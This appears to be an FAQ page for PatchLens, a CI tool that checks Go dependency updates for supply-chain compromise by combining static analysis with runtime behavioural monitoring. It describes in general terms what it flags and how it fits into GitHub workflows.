What languages does PatchLens support?

PatchLens currently only supports Golang projects.

How does PatchLens integrate?

PatchLens is designed to be included as part of your continuous integration pipeline. It works with existing tools (like Dependabot or Snyk) which create pull requests or otherwise initiate dependency updates. When an update CI workflow starts it should execute PatchLens to analyze the update and provide a report specific to the provided change.

Getting Started

If you want to include PatchLens in your GitHub workflows see the go-dep-impact-action repo. For one-off runs or other CI integrations try our open source CLI in the go-update-lens repo.

You detect 0-Day Supply Chain Compromises?

PatchLens combines static code analysis with runtime behavioral analysis to catch suspicious changes in dependency updates:

Static Analysis: We automatically scan for new or modified code that performs security-sensitive operations—like network requests, filesystem access, system calls, or data obfuscation techniques. If a dependency update introduces these capabilities, we flag it for review.

Behavioral Analysis: We don't just look for new capabilities—we monitor how dependencies actually behave at runtime. Even if a package already performs network operations or file access, we detect when that behavior changes. For example:

• A networking library that starts connecting to unexpected servers

• A utility that begins accessing credential files or environment variables it previously ignored

• A package that changes which files it reads or how it processes data

This dual approach catches sophisticated attacks where malicious actors subtly modify legitimate packages to exfiltrate data or compromise systems. Because PatchLens runs automatically in your CI pipeline on every dependency update, these threats are identified before they're merged—turning detection into prevention.

What is the project maturity?

PatchLens is a new tool. Although we are confident that it is capable of providing valuable signal into your dependency updates, it is also still a work in progress. Supported features will improve and evolve, and we welcome your feedback.